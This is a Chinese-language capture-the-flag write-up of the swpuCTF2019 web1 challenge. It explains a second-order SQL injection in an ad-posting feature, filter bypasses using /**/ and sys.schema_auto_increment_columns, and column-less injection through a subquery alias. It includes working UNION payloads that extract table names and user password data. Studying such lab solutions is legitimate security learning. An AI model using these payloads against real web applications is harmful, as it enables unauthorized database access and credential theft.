swpuCTF2019 web1 无列名注入

上周参加的swpuctf比赛第一道web题做了好久，在最后一个小时用非预期的方法做出来了，看了官方题解之后记录一下wp里面的无列名注入。

关于无列名注入可以看一下这篇链接

 https://www.chabug.org/ctf/852.html 

swpuctf的web1题目在buuoj上面已经复现了，可以去上面做一下,buuoj是目前市面上非常好的ctf练习平台。

登录了之后在发布广告处存在sql注入漏洞，我们输入的内容在输入后没有漏洞，当我们发布广告后查看广告详情的时候就造成了二次注入，从而产生了注入。

经过测试,

题目环境过滤了空格，我们使用/**/来进行绕过

过滤了or，因此我们无法使用order by 以及information_schema这个库

因为过滤了注释符，所以查询语句的最后我们要闭合单引号

我们先使用group by判断有多少字段以及回显位置

可以知道字段数为22

同时回显位置是2,3

在无法使用information_schema这个库，所以我们谷歌一下绕过的方法

 https://www.anquanke.com/post/id/193512 

所以我们使用 sys.schema_auto_increment_columns 库来进行查询

首先查询一下表名

payload为:

title=-1'union/**/select/**/1,
(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_colum
ns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,'22&content=1&ac=add

这里buuoj的平台好像没有 sys.schema_auto_increment_columns 这个库，但是在比赛的时候是可以查询到有ads,和users这两个表的，ads盲猜是广告相关的，而且题目的提示里面有使用somd5解密，所以可知我们应该是要获得admin或者flag用户的密码。

接着我们无列名注入users这个表里面的数据

-1'union/**/select/**/1,
(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele
ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

这里对于无列名注入时我们是采用的子查询的方式，子查询是将一个查询语句嵌套在另一个查询语句中，在特定的情况下，一个查询语句的条件需要另一个查询语句来获取，内层查询语句的查询结果，可以为外层查询语句提供查询条件。

这里我们将users这个表里面的查询的结果提供给外部查询，同时把列名转换成a,b，这样我们后面就直接查询a,b列就可以获得结果

我们先查a列，得到的结果如下

可以猜测这里返回的是用户名

于是我们再group_concat(b)，查询b列

获得的结果如下，

得到flag

个人感觉子查询主要在于内部查询的时候将列名转换了，然后外部查询内部查询改变的列名，即可实现绕过。